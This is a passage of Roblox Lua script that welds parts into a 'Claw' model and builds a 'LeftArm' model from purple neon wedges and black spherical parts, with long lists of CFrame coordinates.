  1037. w5.C0 = CFrame.new(13.6108379, 15.7090359, -1.84877098, -4.29027068e-007, 0.500089467, 0.865987122, 1.9046513e-007, -0.865973532, 0.50009501, 1.00001431, 2.18601315e-008, 3.78533827e-008)
  1038. w5.Part1 = p6
  1039. w5.C1 = CFrame.new(19.3720245, -3.33087778, 2.54137325, -0.249996737, -0.491388977, 0.834289134, 0.0669635162, -0.868360817, -0.491391122, 0.965928316, -0.0669792444, 0.24999252)
  1040. w6 = Instance.new("Weld", p6)
  1041. w6.Name = "Part_Weld"
  1042. w6.Part0 = p6
  1043. w6.C0 = CFrame.new(19.3722382, -3.33087826, 2.54137945, -0.250001401, -0.491382152, 0.834303975, 0.0669622123, -0.868364573, -0.491393685, 0.965941966, -0.0669801831, 0.249996051)
  1044. w6.Part1 = p7
  1045. w6.C1 = CFrame.new(16.5012703, -5.1305232, 2.59873891, -4.37113883e-008, -0.000135861075, 1, 0, 1, 0.000135861075, -1, 5.9386762e-012, -4.37113883e-008)
  1046. w7 = Instance.new("Weld", p7)
  1047. w7.Name = "Part_Weld"
  1048. w7.Part0 = p7
  1049. w7.C0 = CFrame.new(16.5014496, -5.13052464, 2.59877563, -3.27825546e-007, -0.000133868307, 1.00001442, -3.57627869e-007, 0.99999994, 0.000135900453, -1.00001431, 1.49011612e-008, -5.96046448e-008)
  1050. w7.Part1 = p8
  1051. w7.C1 = CFrame.new(-0.765930653, -21.3311157, 1.75706458, -1.37833995e-005, 0.965968609, 0.258659452, 0.00428466033, 0.258657128, -0.965959728, -0.999990821, 0.00109495374, -0.00414241292)
  1052. w8 = Instance.new("Weld", p8)
  1053. w8.Name = "Part_Weld"
  1054. w8.Part0 = p8
  1055. w8.C0 = CFrame.new(-0.765703201, -21.3314991, 1.75706851, -1.42129729e-005, 0.965967655, 0.258668512, 0.00428489037, 0.258660465, -0.965972245, -1.00000513, 0.00109496934, -0.00414247159)
  1056. w8.Part1 = p9
  1057. w8.C1 = CFrame.new(11.6857395, -12.2548676, 8.25926208, -0.277089596, 0.631037474, 0.724577785, -0.561487973, 0.505604029, -0.655054033, -0.779713154, -0.588350415, 0.214222342)
  1058. w9 = Instance.new("Weld", p9)
  1059. w9.Name = "Part_Weld"
  1060. w9.Part0 = p9
  1061. w9.C0 = CFrame.new(11.6860123, -12.254859, 8.25934601, -0.277095288, 0.631033003, 0.724593103, -0.561500967, 0.505603611, -0.655058563, -0.779720128, -0.58835566, 0.214224264)
  1062. w9.Part1 = p10
  1063. w9.C1 = CFrame.new(-0.759226322, -21.3225994, -2.35311079, -0.0669693872, 0.965954244, 0.249894977, 0.254174918, 0.258710593, -0.931914091, -0.964836895, 0.00110732042, -0.262847036)
  1064. w10 = Instance.new("Weld", p10)
  1065. w10.Name = "Part_Weld"
  1066. w10.Part0 = p10
  1067. w10.C0 = CFrame.new(-0.759016514, -21.3229256, -2.3531487, -0.0669716895, 0.96595335, 0.249903828, 0.254178405, 0.258713901, -0.93192625, -0.964850724, 0.00110733509, -0.262850702)
  1068. w10.Part1 = p11
  1069. w10.C1 = CFrame.new(18.7059784, -3.17931223, -5.46201515, 0.250018269, -0.49138394, 0.834285676, -0.0669495314, -0.86836195, -0.491391063, 0.965923727, 0.0670017004, -0.250004292)
  1070. w11 = Instance.new("Weld", p11)
  1071. w11.Name = "Part_Weld"
  1072. w11.Part0 = p11
  1073. w11.C0 = CFrame.new(18.7061806, -3.17931461, -5.46200418, 0.250022948, -0.491377324, 0.834300399, -0.0669473261, -0.868365645, -0.491393894, 0.965937555, 0.0670026764, -0.250007868)
  1074. w11.Part1 = p12
  1075. w11.C1 = CFrame.new(13.6104174, 15.708952, -1.1486963, -4.37113883e-008, 0.500093997, 0.865971148, 0, -0.865971148, 0.500093997, 1, 2.18598029e-008, 3.78528e-008)
  1076. w12 = Instance.new("Weld", p12)
  1077. w12.Name = "Part_Weld"
  1078. w12.Part0 = p12
  1079. w12.C0 = CFrame.new(13.6107903, 15.7090092, -1.1487354, -4.76837158e-007, 0.500089884, 0.865987122, 2.83122063e-007, -0.865973473, 0.500095367, 1.00001442, 4.47034836e-008, 1.49011612e-008)
  1080. w12.Part1 = p13
  1081. w12.C1 = CFrame.new(19.4568653, -3.38261366, -1.14870369, -4.37113883e-008, -0.499906093, 0.866079628, 0, -0.866079628, -0.499906093, 1, -2.1851589e-008, 3.78575429e-008)
  1082. w13 = Instance.new("Weld", p13)
  1083. w13.Name = "Part_Weld"
  1084. w13.Part0 = p13
  1085. w13.C0 = CFrame.new(19.457077, -3.38260937, -1.14871991, -4.63888163e-008, -0.499899268, 0.866095126, 5.08347114e-007, -0.866083562, -0.499908328, 1.00001442, -2.18518963e-008, 3.78581007e-008)
  1086. w13.Part1 = p14
  1087. w13.C1 = CFrame.new(-0.765169621, -21.3281136, 1.05768669, -1.37638153e-005, 0.96595937, 0.258693874, 0.00425664661, 0.258691579, -0.965950608, -0.99999094, 0.00108787336, -0.00411530817)
  1088. w14 = Instance.new("Weld", p14)
  1089. w14.Name = "ArmPart_Weld"
  1090. w14.Part0 = p14
  1091. w14.C0 = CFrame.new(-0.764959335, -21.3284416, 1.05770254, -1.42545232e-005, 0.965958476, 0.258703023, 0.00425684778, 0.258694947, -0.965963125, -1.00000536, 0.00108788908, -0.00411536777)
  1092. w14.Part1 = p15
  1093. w14.C1 = CFrame.new(16.0000172, 5.13429213, -1.49874043, -4.37113883e-008, 0.000108154614, 1, 0, -1, 0.000108154614, 1, 4.72758855e-012, 4.37113883e-008)
  1094. w15 = Instance.new("Weld", p15)
  1095. w15.Name = "Part_Weld"
  1096. w15.Part0 = p15
  1097. w15.C0 = CFrame.new(16.0001163, 5.13430214, -1.49877143, -2.99420208e-007, 0.00011029192, 1.00001454, 4.39002179e-007, -1, 0.000108176115, 1.00001442, 0, 4.42378223e-008)
  1098. w15.Part1 = p16
  1099. w15.C1 = CFrame.new(16.5000153, 6.13429213, -1.49872518, -4.37113883e-008, 0.000108154614, 1, 0, -1, 0.000108154614, 1, 4.72758855e-012, 4.37113883e-008)
  1100. w16 = Instance.new("Weld", p16)
  1101. w16.Name = "Part_Weld"
  1102. w16.Part0 = p16
  1103. w16.C0 = CFrame.new(16.5002594, 6.1342907, -1.49874651, -2.98894406e-007, 0.000110270419, 1.00001454, 4.39006953e-007, -1, 0.000108154614, 1.00001442, 4.71678729e-012, 4.37120207e-008)
  1104. w16.Part1 = p17
  1105. w16.C1 = CFrame.new(16.8263168, 6.46704865, 8.05857849, 0.396029502, -0.207962677, 0.894378066, -0.497426808, 0.770130157, 0.399332225, -0.771833658, -0.603034973, 0.201548025)
  1106. w17 = Instance.new("Weld", p17)
  1107. w17.Name = "Part_Weld"
  1108. w17.Part0 = p17
  1109. w17.C0 = CFrame.new(16.8266068, 6.46726036, 8.05869198, 0.396035522, -0.207958207, 0.894391596, -0.497440547, 0.770127177, 0.399337679, -0.771840453, -0.603040278, 0.201549783)
  1110. w17.Part1 = p18
  1111. w17.C1 = CFrame.new(-0.991122723, -20.5004215, 5.08983374, 0.0669417754, 0.965955615, 0.249897182, -0.245835528, 0.258705586, -0.9341501, -0.966997266, 0.00110005983, 0.254784435)
  1112. w18 = Instance.new("Weld", p18)
  1113. w18.Name = "Part_Weld"
  1114. w18.Part0 = p18
  1115. w18.C0 = CFrame.new(-0.990923882, -20.5007305, 5.08983374, 0.066943109, 0.965954781, 0.249906152, -0.245838761, 0.258709013, -0.934162259, -0.967011333, 0.00110003352, 0.254788101)
  1116. w18.Part1 = p19
  1117. w18.C1 = CFrame.new(10.4456682, -15.7977238, -7.8332901, 0.559388936, -0.68521893, 0.466432214, 0.116898462, -0.491870552, -0.862785101, 0.820620954, 0.537157655, -0.195045918)
  1118. w19 = Instance.new("Weld", p19)
  1119. w19.Name = "Part_Weld"
  1120. w19.Part0 = p19
  1121. w19.C0 = CFrame.new(10.4457512, -15.7979813, -7.83342838, 0.559401393, -0.685213447, 0.466440916, 0.116905749, -0.491872638, -0.862796843, 0.820629179, 0.537163019, -0.195047855)
  1122. w19.Part1 = p20
  1123. w19.C1 = CFrame.new(16.5012665, -4.13050127, 1.49876332, -4.37113883e-008, -0.000135854745, 1, 0, 1, 0.000135854745, -1, 5.93839951e-012, -4.37113883e-008)
  1124. w20 = Instance.new("Weld", p20)
  1125. w20.Name = "Part_Weld"
  1126. w20.Part0 = p20
  1127. w20.C0 = CFrame.new(16.5013981, -4.13050938, 1.498757, -2.38418579e-007, -0.000133797526, 1.00001466, -4.47034836e-007, 1.00000024, 0.000135831535, -1.00001454, -2.98023224e-008, -5.96046448e-008)
  1128. w20.Part1 = p21
  1129. w20.C1 = CFrame.new(16.5012627, -5.13048887, 0.39874959, -4.37113883e-008, -0.000135854745, 1, 0, 1, 0.000135854745, -1, 5.93839951e-012, -4.37113883e-008)
  1130. w21 = Instance.new("Weld", p21)
  1131. w21.Name = "Wedge_Weld"
  1132. w21.Part0 = p21
  1133. w21.C0 = CFrame.new(16.5014935, -5.13049126, 0.398722976, -2.22529991e-007, -0.000133820766, 1.00001466, -4.17224015e-007, 1.00000024, 0.000135854774, -1.00001454, 5.9472427e-012, -4.37120207e-008)
  1134. w21.Part1 = p22
  1135. w21.C1 = CFrame.new(-16.5005875, 4.13259029, 2.94876933, -4.37113883e-008, 1.39792737e-005, -1, 0, -1, -1.39792737e-005, -1, -6.11053471e-013, 4.37113883e-008)
  1136. w22 = Instance.new("Weld", p22)
  1137. w22.Name = "Part_Weld"
  1138. w22.Part0 = p22
  1139. w22.C0 = CFrame.new(-16.500824, 4.13258791, 2.94888711, 1.35156796e-007, 1.19470278e-005, -1.00001466, 4.17202415e-007, -1.00000024, -1.39792755e-005, -1.00001454, -6.07483681e-013, 4.37120278e-008)
  1140. w22.Part1 = p23
  1141. w22.C1 = CFrame.new(11.3238592, 16.2938461, -5.83674097, 0.167913347, 0.593457043, 0.787155509, 0.220650926, -0.800859332, 0.556720257, 0.960790455, 0.0802058354, -0.265421808)
  1142. w23 = Instance.new("Weld", p23)
  1143. w23.Name = "Wedge_Weld"
  1144. w23.Part0 = p23
  1145. w23.C0 = CFrame.new(11.3242846, 16.2939701, -5.83676767, 0.167916089, 0.593452632, 0.787171543, 0.220654398, -0.800862908, 0.556722164, 0.960804224, 0.0802069977, -0.265425682)
  1146. w23.Part1 = p24
  1147. w23.C1 = CFrame.new(-16.5190907, -6.08210278, -0.053311754, -0.000165350299, 0.00304719806, -0.999995351, -0.000303142268, 0.999995351, 0.00304725766, 0.99999994, 0.000303644716, -0.000164425801)
  1148. w24 = Instance.new("Weld", p24)
  1149. w24.Name = "Part_Weld"
  1150. w24.Part0 = p24
  1151. w24.C0 = CFrame.new(-16.5192356, -6.08211088, -0.0533116534, -0.000165194273, 0.00304524973, -1.00001013, -0.00030361861, 0.999995589, 0.00304720178, 1.00001442, 0.000303655863, -0.000164449215)
  1152. w24.Part1 = p25
  1153. w24.C1 = CFrame.new(5.14108515, 1.49960721, -17.9982204, 1.16387992e-005, -0.999999881, 0.000471503939, -1, -1.1615477e-005, 4.94651576e-005, -4.94596788e-005, -0.000471504522, -0.999999881)
  1154. w25 = Instance.new("Weld", p25)
  1155. w25.Name = "Part_Weld"
  1156. w25.Part0 = p25
  1157. w25.C0 = CFrame.new(5.14104986, 1.49967504, -17.9985313, 1.20991026e-005, -1.00000024, 0.000469659513, -1.00001454, -1.16155716e-005, 4.96469293e-005, -4.94604174e-005, -0.000471511274, -1.00001466)
  1158. w25.Part1 = p26
  1159. w25.C1 = CFrame.new(5.07938719, 17.5157299, 1.50311017, 0.00030336561, -0.99999541, -0.00302907825, 0.000164940167, -0.00302901864, 0.999995351, -0.99999994, -0.000303863839, 0.000164020501)
  1160. m.Parent = char
  1161. m:MakeJoints()
  1162. ----------------------------------------------------
  1163. local cor2 = Instance.new("Part", char.Claw)
  1164. cor2.Name = "Thingy"
  1165. cor2.Locked = true
  1166. cor2.BottomSurface = 0
  1167. cor2.CanCollide = false
  1168. cor2.Size = Vector3.new(2, 1, 1)
  1169. cor2.Transparency = 1
  1170. cor2.TopSurface = 0
  1171. corw2 = Instance.new("Weld", cor2)
  1172. corw2.Part0 = larm
  1173. corw2.Part1 = cor2
  1174. corw2.C0 = CFrame.new(0, -1, 0) * CFrame.Angles(math.rad(0), math.rad(180), math.rad(90))
  1175. corw2.C1 = CFrame.new(0, 0, 0)
  1176. weld2 = Instance.new("Weld", char.Claw)
  1177. weld2.Part0 = cor2
  1178. weld2.Part1 = char.Claw.ArmPart
  1179. weld2.C0 = CFrame.new(0, 0, 0)
  1180. ----------------------------------------------------
  1181. local m = Instance.new("Model")
  1182. m.Name = "LeftArm"
  1183. p1 = Instance.new("WedgePart", m)
  1184. p1.BrickColor = BrickColor.new("Royal purple")
  1185. p1.Material = Enum.Material.Neon
  1186. p1.Name = "Wedge"
  1187. p1.FormFactor = Enum.FormFactor.Custom
  1188. p1.Size = Vector3.new(1, 1.19999981, 4)
  1189. p1.CFrame = CFrame.new(60.830101, 8.39941978, -13.7674818, 1.52359269e-006, -0.707334042, 0.707343757, -2.62521735e-006, 0.707093, 0.707071185, -1.00027835, 3.43534703e-006, 4.43342998e-007)
  1190. p1.CanCollide = false
  1191. p1.Locked = true
  1192. p1.TopSurface = Enum.SurfaceType.Smooth
  1193. b1 = Instance.new("SpecialMesh", p1)
  1194. b1.MeshType = Enum.MeshType.Wedge
  1195. b1.Name = "Mesh"
  1196. b1.Scale = Vector3.new(0.200000003, 1, 1)
  1197. p2 = Instance.new("WedgePart", m)
  1198. p2.BrickColor = BrickColor.new("Royal purple")
  1199. p2.Material = Enum.Material.Neon
  1200. p2.Name = "Wedge"
  1201. p2.FormFactor = Enum.FormFactor.Custom
  1202. p2.Size = Vector3.new(1, 1.19999981, 4)
  1203. p2.CFrame = CFrame.new(60.8306694, 8.39941502, -12.5672398, 1.56085741e-006, -0.707337618, 0.707340181, -2.7146209e-006, 0.707089424, 0.707074761, -1.00027835, 3.34575839e-006, 4.06471969e-007)
  1204. p2.CanCollide = false
  1205. p2.Locked = true
  1206. p2.TopSurface = Enum.SurfaceType.Smooth
  1207. b2 = Instance.new("SpecialMesh", p2)
  1208. b2.MeshType = Enum.MeshType.Wedge
  1209. b2.Name = "Mesh"
  1210. b2.Scale = Vector3.new(0.200000003, 1, 1)
  1211. p3 = Instance.new("WedgePart", m)
  1212. p3.BrickColor = BrickColor.new("Royal purple")
  1213. p3.Material = Enum.Material.Neon
  1214. p3.Name = "Wedge"
  1215. p3.FormFactor = Enum.FormFactor.Custom
  1216. p3.Size = Vector3.new(1, 1.19999981, 4)
  1217. p3.CFrame = CFrame.new(60.8312187, 8.39939976, -13.1675138, 1.66519976e-006, -0.707341254, 0.707336545, -2.72952207e-006, 0.707085788, 0.707078397, -1.00027835, 3.26143936e-006, 4.69727013e-007)
  1218. p3.CanCollide = false
  1219. p3.Locked = true
  1220. p3.TopSurface = Enum.SurfaceType.Smooth
  1221. b3 = Instance.new("SpecialMesh", p3)
  1222. b3.MeshType = Enum.MeshType.Wedge
  1223. b3.Name = "Mesh"
  1224. b3.Scale = Vector3.new(0.200000003, 1, 1)
  1225. p4 = Instance.new("WedgePart", m)
  1226. p4.BrickColor = BrickColor.new("Royal purple")
  1227. p4.Material = Enum.Material.Neon
  1228. p4.Name = "Wedge"
  1229. p4.FormFactor = Enum.FormFactor.Custom
  1230. p4.Size = Vector3.new(1, 1.19999981, 4)
  1231. p4.CFrame = CFrame.new(60.8317757, 8.39937305, -13.1676111, 1.74718321e-006, -0.70734489, 0.707332909, -2.7742235e-006, 0.707082152, 0.707082033, -1.00027835, 3.17185027e-006, 4.96093037e-007)
  1232. p4.CanCollide = false
  1233. p4.Locked = true
  1234. p4.TopSurface = Enum.SurfaceType.Smooth
  1235. b4 = Instance.new("SpecialMesh", p4)
  1236. b4.MeshType = Enum.MeshType.Wedge
  1237. b4.Name = "Mesh"
  1238. b4.Scale = Vector3.new(0.200000003, 1, 1)
  1239. p5 = Instance.new("WedgePart", m)
  1240. p5.BrickColor = BrickColor.new("Royal purple")
  1241. p5.Material = Enum.Material.Neon
  1242. p5.Name = "Wedge"
  1243. p5.FormFactor = Enum.FormFactor.Custom
  1244. p5.Size = Vector3.new(1, 1.19999981, 3.30000019)
  1245. p5.CFrame = CFrame.new(60.4623528, 9.0813055, -13.1677084, -1.74365277e-006, 0.422768414, 0.90661031, 3.01146247e-006, -0.90627563, 0.422602654, 1.00028574, -3.16541991e-006, -6.48408104e-007)
  1246. p5.CanCollide = false
  1247. p5.Locked = true
  1248. p5.TopSurface = Enum.SurfaceType.Smooth
  1249. b5 = Instance.new("SpecialMesh", p5)
  1250. b5.MeshType = Enum.MeshType.Wedge
  1251. b5.Name = "Mesh"
  1252. b5.Scale = Vector3.new(0.200000003, 1, 1)
  1253. p6 = Instance.new("WedgePart", m)
  1254. p6.BrickColor = BrickColor.new("Royal purple")
  1255. p6.Material = Enum.Material.Neon
  1256. p6.Name = "Wedge"
  1257. p6.FormFactor = Enum.FormFactor.Custom
  1258. p6.Size = Vector3.new(1, 1.19999981, 3.30000019)
  1259. p6.CFrame = CFrame.new(60.4629173, 9.08128643, -13.7679863, -1.75857326e-006, 0.422772557, 0.906618714, 3.13068858e-006, -0.906274974, 0.422602147, 1.00029314, -3.27979569e-006, -6.11540997e-007)
  1260. p6.CanCollide = false
  1261. p6.Locked = true
  1262. p6.TopSurface = Enum.SurfaceType.Smooth
  1263. b6 = Instance.new("SpecialMesh", p6)
  1264. b6.MeshType = Enum.MeshType.Wedge
  1265. b6.Name = "Mesh"
  1266. b6.Scale = Vector3.new(0.200000003, 1, 1)
  1267. p7 = Instance.new("WedgePart", m)
  1268. p7.BrickColor = BrickColor.new("Royal purple")
  1269. p7.Material = Enum.Material.Neon
  1270. p7.Name = "Wedge"
  1271. p7.FormFactor = Enum.FormFactor.Custom
  1272. p7.Size = Vector3.new(1, 1.19999981, 3.30000019)
  1273. p7.CFrame = CFrame.new(60.4634781, 9.0812645, -12.5677195, -1.77349398e-006, 0.422776699, 0.906627119, 3.24991538e-006, -0.906274319, 0.42260164, 1.00030053, -3.39417238e-006, -5.74673834e-007)
  1274. p7.CanCollide = false
  1275. p7.Locked = true
  1276. p7.TopSurface = Enum.SurfaceType.Smooth
  1277. b7 = Instance.new("SpecialMesh", p7)
  1278. b7.MeshType = Enum.MeshType.Wedge
  1279. b7.Name = "Mesh"
  1280. b7.Scale = Vector3.new(0.200000003, 1, 1)
  1281. p8 = Instance.new("Part", m)
  1282. p8.BrickColor = BrickColor.new("Really black")
  1283. p8.Material = Enum.Material.Neon
  1284. p8.FormFactor = Enum.FormFactor.Custom
  1285. p8.Size = Vector3.new(0.400000006, 0.400000006, 0.400000006)
  1286. p8.CFrame = CFrame.new(62.1344833, 9.89923668, -14.2683573, 1.0003655, -9.00030136e-006, -1.6914961e-006, -8.34465027e-007, 0.999961495, 3.15914986e-006, -2.15653972e-006, 3.05826416e-006, 1.00030792)
  1287. p8.CanCollide = false
  1288. p8.Locked = true
  1289. p8.BottomSurface = Enum.SurfaceType.Smooth
  1290. p8.TopSurface = Enum.SurfaceType.Smooth
  1291. b8 = Instance.new("SpecialMesh", p8)
  1292. b8.MeshType = Enum.MeshType.Sphere
  1293. b8.Name = "Mesh"
  1294. p9 = Instance.new("Part", m)
  1295. p9.BrickColor = BrickColor.new("Really black")
  1296. p9.Material = Enum.Material.Neon
  1297. p9.FormFactor = Enum.FormFactor.Custom
  1298. p9.Size = Vector3.new(0.400000006, 0.400000006, 0.400000006)
  1299. p9.CFrame = CFrame.new(62.1350441, 7.19933271, -14.2684784, 1.00037432, -9.11423649e-006, -1.78677055e-006, -8.82557742e-007, 0.999960482, 3.17407398e-006, -2.19382355e-006, 3.14769591e-006, 1.00031543)
  1300. p9.CanCollide = false
  1301. p9.Locked = true
  1302. p9.BottomSurface = Enum.SurfaceType.Smooth
  1303. p9.TopSurface = Enum.SurfaceType.Smooth
  1304. b9 = Instance.new("SpecialMesh", p9)
  1305. b9.MeshType = Enum.MeshType.Sphere
  1306. b9.Name = "Mesh"
  1307. p10 = Instance.new("Part", m)
  1308. p10.BrickColor = BrickColor.new("Royal purple")
  1309. p10.Material = Enum.Material.Neon
  1310. p10.FormFactor = Enum.FormFactor.Custom
  1311. p10.Size = Vector3.new(0.200000048, 1.79999983, 0.200000048)
  1312. p10.CFrame = CFrame.new(62.4732666, 7.92819929, -14.2685785, -0.906659067, -0.422771662, -1.80169195e-006, 0.422602057, -0.906270981, 3.2933026e-006, 3.38190716e-006, -1.99476835e-006, 1.00032294)
  1313. p10.CanCollide = false
  1314. p10.Locked = true
  1315. p10.BottomSurface = Enum.SurfaceType.Smooth
  1316. p10.TopSurface = Enum.SurfaceType.Smooth
  1317. p11 = Instance.new("Part", m)
  1318. p11.BrickColor = BrickColor.new("Royal purple")
  1319. p11.Material = Enum.Material.Neon
  1320. p11.FormFactor = Enum.FormFactor.Custom
  1321. p11.Size = Vector3.new(0.200000048, 1.29999983, 0.200000048)
  1322. p11.CFrame = CFrame.new(62.4794731, 9.45469475, -14.2686787, -0.819467902, 0.573809147, -1.81661335e-006, -0.573551893, -0.819118977, 3.41253167e-006, -9.27350783e-008, -4.03244348e-006, 1.00033033)
  1323. p11.CanCollide = false
  1324. p11.Locked = true
  1325. p11.BottomSurface = Enum.SurfaceType.Smooth
  1326. p11.TopSurface = Enum.SurfaceType.Smooth
  1327. p12 = Instance.new("Part", m)
  1328. p12.BrickColor = BrickColor.new("Really black")
  1329. p12.Material = Enum.Material.Neon
  1330. p12.FormFactor = Enum.FormFactor.Custom
  1331. p12.Size = Vector3.new(0.400000006, 0.400000006, 0.400000006)
  1332. p12.CFrame = CFrame.new(62.7369499, 6.29933262, -14.2688055, 1.00040102, -9.53674316e-006, -1.84644205e-006, -1.25169754e-006, 0.999957919, 3.50196092e-006, -2.25187659e-006, 3.46763295e-006, 1.00033784)
  1333. p12.CanCollide = false
  1334. p12.Locked = true
  1335. p12.BottomSurface = Enum.SurfaceType.Smooth
  1336. p12.TopSurface = Enum.SurfaceType.Smooth
  1337. b10 = Instance.new("SpecialMesh", p12)
  1338. b10.MeshType = Enum.MeshType.Sphere
  1339. b10.Name = "Mesh"
  1340. p13 = Instance.new("Part", m)
  1341. p13.BrickColor = BrickColor.new("Royal purple")
  1342. p13.Material = Enum.Material.Neon
  1343. p13.FormFactor = Enum.FormFactor.Custom
  1344. p13.Size = Vector3.new(1.5, 1.5, 1.5)
  1345. p13.CFrame = CFrame.new(62.8003883, 10.1991549, -13.2136488, 1.00040984, -9.59636054e-006, -1.88372474e-006, -1.43051466e-006, 0.999956846, 3.58340549e-006, -2.3487878e-006, 3.4825357e-006, 1.00034535)
  1346. p13.CanCollide = false
  1347. p13.Locked = true
  1348. p13.BottomSurface = Enum.SurfaceType.Smooth
  1349. p13.TopSurface = Enum.SurfaceType.Smooth
  1350. b11 = Instance.new("SpecialMesh", p13)
  1351. b11.MeshType = Enum.MeshType.Sphere
  1352. b11.Name = "Mesh"
  1353. p14 = Instance.new("Part", m)
  1354. p14.BrickColor = BrickColor.new("Really black")
  1355. p14.Material = Enum.Material.Neon
  1356. p14.FormFactor = Enum.FormFactor.Custom
  1357. p14.Size = Vector3.new(0.400000006, 0.400000006, 0.400000006)
  1358. p14.CFrame = CFrame.new(62.7374802, 9.79915905, -14.2689018, 1.00041437, -9.80505502e-006, -1.96572228e-006, -1.37091877e-006, 0.999956131, 3.62812011e-006, -2.37115751e-006, 3.4527211e-006, 1.00034904)
  1359. p14.CanCollide = false
  1360. p14.Locked = true
  1361. p14.BottomSurface = Enum.SurfaceType.Smooth
  1362. p14.TopSurface = Enum.SurfaceType.Smooth
  1363. b12 = Instance.new("SpecialMesh", p14)
  1364. b12.MeshType = Enum.MeshType.Sphere
  1365. b12.Name = "Mesh"
  1366. p15 = Instance.new("Part", m)
  1367. p15.BrickColor = BrickColor.new("Really black")
  1368. p15.Material = Enum.Material.Metal
  1369. p15.Name = "Main"
  1370. p15.FormFactor = Enum.FormFactor.Custom
  1371. p15.Size = Vector3.new(2.20000005, 4.19999981, 2.20000005)
  1372. p15.CFrame = CFrame.new(62.838131, 8.1992178, -13.1686192, 1.00041902, -9.80505047e-006, -1.96572933e-006, -1.54973122e-006, 0.999955654, 3.62813353e-006, -2.38607572e-006, 3.57197018e-006, 1.00035274)
  1373. p15.CanCollide = false
  1374. p15.Locked = true
  1375. p15.BottomSurface = Enum.SurfaceType.Smooth
  1376. p15.TopSurface = Enum.SurfaceType.Smooth
  1377. p16 = Instance.new("Part", m)
  1378. p16.BrickColor = BrickColor.new("Really black")
  1379. p16.Material = Enum.Material.Neon
  1380. p16.FormFactor = Enum.FormFactor.Custom
  1381. p16.Size = Vector3.new(0.400000006, 0.400000006, 0.400000006)
  1382. p16.CFrame = CFrame.new(62.9387741, 8.79918098, -14.2691231, 1.0004282, -9.95411301e-006, -2.00301338e-006, -1.66894927e-006, 0.999954581, 3.71756369e-006, -2.46808372e-006, 3.61668594e-006, 1.00036013)
  1383. p16.CanCollide = false
  1384. p16.Locked = true
  1385. p16.BottomSurface = Enum.SurfaceType.Smooth
  1386. p16.TopSurface = Enum.SurfaceType.Smooth
  1387. b13 = Instance.new("SpecialMesh", p16)
  1388. b13.MeshType = Enum.MeshType.Sphere
  1389. b13.Name = "Mesh"
  1390. p17 = Instance.new("Part", m)
  1391. p17.BrickColor = BrickColor.new("Royal purple")
  1392. p17.Material = Enum.Material.Neon
  1393. p17.FormFactor = Enum.FormFactor.Custom
  1394. p17.Size = Vector3.new(0.200000048, 1.29999983, 0.200000048)
  1395. p17.CFrame = CFrame.new(63.0825539, 6.854743, -14.2692442, -0.866409063, -0.50020963, -2.099928e-006, 0.499978155, -0.86598444, 3.73249213e-006, 4.01878242e-006, -1.94999211e-006, 1.00036764)
  1396. p17.CanCollide = false
  1397. p17.Locked = true
  1398. p17.BottomSurface = Enum.SurfaceType.Smooth
  1399. p17.TopSurface = Enum.SurfaceType.Smooth
  1400. p18 = Instance.new("Part", m)
  1401. p18.BrickColor = BrickColor.new("Royal purple")
  1402. p18.Material = Enum.Material.Neon
  1403. p18.FormFactor = Enum.FormFactor.Custom
  1404. p18.Size = Vector3.new(0.200000048, 1.29999983, 0.200000048)
  1405. p18.CFrame = CFrame.new(63.1831665, 8.15466595, -14.2693415, -0.906707585, 0.422816038, -2.11485258e-006, -0.422596663, -0.906265914, 3.8437388e-006, 6.9698217e-007, -4.50413063e-006, 1.00037515)
  1406. p18.CanCollide = false
  1407. p18.Locked = true
  1408. p18.BottomSurface = Enum.SurfaceType.Smooth
  1409. p18.TopSurface = Enum.SurfaceType.Smooth
  1410. p19 = Instance.new("Part", m)
  1411. p19.BrickColor = BrickColor.new("Royal purple")
  1412. p19.Material = Enum.Material.Neon
  1413. p19.FormFactor = Enum.FormFactor.Custom
  1414. p19.Size = Vector3.new(0.200000048, 0.799999833, 0.200000048)
  1415. p19.CFrame = CFrame.new(63.2069473, 8.53140068, -14.2694473, -0.707418501, 0.707425714, -2.09994369e-006, -0.707068563, -0.707078457, 3.72453474e-006, -9.59315798e-007, -4.56575162e-006, 1.00037515)
  1416. p19.CanCollide = false
  1417. p19.Locked = true
  1418. p19.BottomSurface = Enum.SurfaceType.Smooth
  1419. p19.TopSurface = Enum.SurfaceType.Smooth
  1420. p20 = Instance.new("Part", m)
  1421. p20.BrickColor = BrickColor.new("Royal purple")
  1422. p20.Material = Enum.Material.Neon
  1423. p20.FormFactor = Enum.FormFactor.Custom
  1424. p20.Size = Vector3.new(0.200000048, 0.899999917, 0.200000048)
  1425. p20.CFrame = CFrame.new(63.2280884, 9.68191624, -14.2694416, -0.342169315, 0.940117717, -2.11486008e-006, -0.93964541, -0.342010528, 3.84375198e-006, -2.7989995e-006, -3.73256239e-006, 1.00037885)
  1426. p20.CanCollide = false
  1427. p20.Locked = true
  1428. p20.BottomSurface = Enum.SurfaceType.Smooth
  1429. p20.TopSurface = Enum.SurfaceType.Smooth
  1430. p21 = Instance.new("Part", m)
  1431. p21.BrickColor = BrickColor.new("Royal purple")
  1432. p21.Material = Enum.Material.Neon
  1433. p21.FormFactor = Enum.FormFactor.Custom
  1434. p21.Size = Vector3.new(0.200000048, 0.999999821, 0.200000048)
  1435. p21.CFrame = CFrame.new(63.3539009, 9.07959557, -14.2694454, 0.707428038, 0.707422554, -2.12876989e-006, -0.707079053, 0.707067132, 3.83015185e-006, -4.56554562e-006, 9.7875602e-007, 1.00037885)
  1436. p21.CanCollide = false
  1437. p21.Locked = true
  1438. p21.BottomSurface = Enum.SurfaceType.Smooth
  1439. p21.TopSurface = Enum.SurfaceType.Smooth
  1440. p22 = Instance.new("Part", m)
  1441. p22.BrickColor = BrickColor.new("Really black")
  1442. p22.Material = Enum.Material.Neon
  1443. p22.FormFactor = Enum.FormFactor.Custom
  1444. p22.Size = Vector3.new(0.400000006, 0.400000006, 0.400000006)
  1445. p22.CFrame = CFrame.new(63.4412346, 7.49916172, -14.269558, 1.0004549, -5.30481339e-006, -2.11486781e-006, -7.24196434e-006, 0.999951959, 3.84376608e-006, -2.5650661e-006, 4.02606338e-006, 1.00038254)
  1446. p22.CanCollide = false
  1447. p22.Locked = true
  1448. p22.BottomSurface = Enum.SurfaceType.Smooth
  1449. p22.TopSurface = Enum.SurfaceType.Smooth
  1450. b14 = Instance.new("SpecialMesh", p22)
  1451. b14.MeshType = Enum.MeshType.Sphere
  1452. b14.Name = "Mesh"
  1453. p23 = Instance.new("Part", m)
  1454. p23.BrickColor = BrickColor.new("Really black")
  1455. p23.Material = Enum.Material.Neon
  1456. p23.FormFactor = Enum.FormFactor.Custom
